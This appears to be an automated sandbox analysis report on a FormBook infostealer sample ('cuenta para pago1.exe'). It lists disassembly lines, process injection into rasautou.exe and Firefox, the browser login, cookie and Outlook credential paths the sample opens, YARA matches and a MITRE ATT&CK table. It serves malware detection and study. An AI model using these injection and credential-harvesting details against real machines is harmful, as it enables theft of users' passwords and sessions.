        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C91E5 mov eax, dword ptr fs:[00000030h]2_2_348C91E5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EB1E0 mov eax, dword ptr fs:[00000030h]2_2_348EB1E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA1E3 mov eax, dword ptr fs:[00000030h]2_2_348CA1E3
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349881EE mov eax, dword ptr fs:[00000030h]2_2_349881EE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349881EE mov eax, dword ptr fs:[00000030h]2_2_349881EE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B91F0 mov eax, dword ptr fs:[00000030h]2_2_348B91F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B91F0 mov eax, dword ptr fs:[00000030h]2_2_348B91F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01F1 mov eax, dword ptr fs:[00000030h]2_2_348D01F1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF1F0 mov eax, dword ptr fs:[00000030h]2_2_348EF1F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF1F0 mov eax, dword ptr fs:[00000030h]2_2_348EF1F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E510F mov eax, dword ptr fs:[00000030h]2_2_348E510F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C510D mov eax, dword ptr fs:[00000030h]2_2_348C510D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0118 mov eax, dword ptr fs:[00000030h]2_2_348F0118
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF113 mov eax, dword ptr fs:[00000030h]2_2_348BF113
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F7128 mov eax, dword ptr fs:[00000030h]2_2_348F7128
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F7128 mov eax, dword ptr fs:[00000030h]2_2_348F7128
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F13E mov eax, dword ptr fs:[00000030h]2_2_3497F13E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA147 mov eax, dword ptr fs:[00000030h]2_2_348BA147
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA147 mov eax, dword ptr fs:[00000030h]2_2_348BA147
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA147 mov eax, dword ptr fs:[00000030h]2_2_348BA147
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34993157 mov eax, dword ptr fs:[00000030h]2_2_34993157
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34993157 mov eax, dword ptr fs:[00000030h]2_2_34993157
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34993157 mov eax, dword ptr fs:[00000030h]2_2_34993157
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34995149 mov eax, dword ptr fs:[00000030h]2_2_34995149
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495314A mov eax, dword ptr fs:[00000030h]2_2_3495314A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495314A mov eax, dword ptr fs:[00000030h]2_2_3495314A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495314A mov eax, dword ptr fs:[00000030h]2_2_3495314A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495314A mov eax, dword ptr fs:[00000030h]2_2_3495314A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C6179 mov eax, dword ptr fs:[00000030h]2_2_348C6179
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E289 mov eax, dword ptr fs:[00000030h]2_2_3493E289
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7290 mov eax, dword ptr fs:[00000030h]2_2_348C7290
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7290 mov eax, dword ptr fs:[00000030h]2_2_348C7290
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7290 mov eax, dword ptr fs:[00000030h]2_2_348C7290
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E42AF mov eax, dword ptr fs:[00000030h]2_2_348E42AF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E42AF mov eax, dword ptr fs:[00000030h]2_2_348E42AF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B92AF mov eax, dword ptr fs:[00000030h]2_2_348B92AF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B2BC mov eax, dword ptr fs:[00000030h]2_2_3499B2BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B2BC mov eax, dword ptr fs:[00000030h]2_2_3499B2BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B2BC mov eax, dword ptr fs:[00000030h]2_2_3499B2BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B2BC mov eax, dword ptr fs:[00000030h]2_2_3499B2BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349892AB mov eax, dword ptr fs:[00000030h]2_2_349892AB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F2AE mov eax, dword ptr fs:[00000030h]2_2_3497F2AE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BC2B0 mov ecx, dword ptr fs:[00000030h]2_2_348BC2B0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E32C5 mov eax, dword ptr fs:[00000030h]2_2_348E32C5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349932C9 mov eax, dword ptr fs:[00000030h]2_2_349932C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD2EC mov eax, dword ptr fs:[00000030h]2_2_348BD2EC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD2EC mov eax, dword ptr fs:[00000030h]2_2_348BD2EC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B72E0 mov eax, dword ptr fs:[00000030h]2_2_348B72E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CA2E0 mov eax, dword ptr fs:[00000030h]2_2_348CA2E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C82E0 mov eax, dword ptr fs:[00000030h]2_2_348C82E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C82E0 mov eax, dword ptr fs:[00000030h]2_2_348C82E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C82E0 mov eax, dword ptr fs:[00000030h]2_2_348C82E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C82E0 mov eax, dword ptr fs:[00000030h]2_2_348C82E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D02F9 mov eax, dword ptr fs:[00000030h]2_2_348D02F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494B214 mov eax, dword ptr fs:[00000030h]2_2_3494B214
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494B214 mov eax, dword ptr fs:[00000030h]2_2_3494B214
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA200 mov eax, dword ptr fs:[00000030h]2_2_348BA200
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B821B mov eax, dword ptr fs:[00000030h]2_2_348B821B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FA22B mov eax, dword ptr fs:[00000030h]2_2_348FA22B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FA22B mov eax, dword ptr fs:[00000030h]2_2_348FA22B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FA22B mov eax, dword ptr fs:[00000030h]2_2_348FA22B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34940227 mov eax, dword ptr fs:[00000030h]2_2_34940227
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34940227 mov eax, dword ptr fs:[00000030h]2_2_34940227
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34940227 mov eax, dword ptr fs:[00000030h]2_2_34940227
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E0230 mov ecx, dword ptr fs:[00000030h]2_2_348E0230
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF24A mov eax, dword ptr fs:[00000030h]2_2_348EF24A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F247 mov eax, dword ptr fs:[00000030h]2_2_3497F247
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497D270 mov eax, dword ptr fs:[00000030h]2_2_3497D270
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3495327E mov eax, dword ptr fs:[00000030h]2_2_3495327E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB273 mov eax, dword ptr fs:[00000030h]2_2_348BB273
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB273 mov eax, dword ptr fs:[00000030h]2_2_348BB273
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB273 mov eax, dword ptr fs:[00000030h]2_2_348BB273
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1380 mov eax, dword ptr fs:[00000030h]2_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1380 mov eax, dword ptr fs:[00000030h]2_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1380 mov eax, dword ptr fs:[00000030h]2_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1380 mov eax, dword ptr fs:[00000030h]2_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1380 mov eax, dword ptr fs:[00000030h]2_2_348C1380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF380 mov eax, dword ptr fs:[00000030h]2_2_348DF380
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F38A mov eax, dword ptr fs:[00000030h]2_2_3497F38A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EA390 mov eax, dword ptr fs:[00000030h]2_2_348EA390
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EA390 mov eax, dword ptr fs:[00000030h]2_2_348EA390
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EA390 mov eax, dword ptr fs:[00000030h]2_2_348EA390
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493C3B0 mov eax, dword ptr fs:[00000030h]2_2_3493C3B0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C93A6 mov eax, dword ptr fs:[00000030h]2_2_348C93A6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C93A6 mov eax, dword ptr fs:[00000030h]2_2_348C93A6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349443D5 mov eax, dword ptr fs:[00000030h]2_2_349443D5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C63CB mov eax, dword ptr fs:[00000030h]2_2_348C63CB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BE3C0 mov eax, dword ptr fs:[00000030h]2_2_348BE3C0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\rasautou.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7A9000000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\rasautou.exeThread APC queued: target process: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\rasautou.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7A9000000Jump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exeJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeProcess created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts411
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
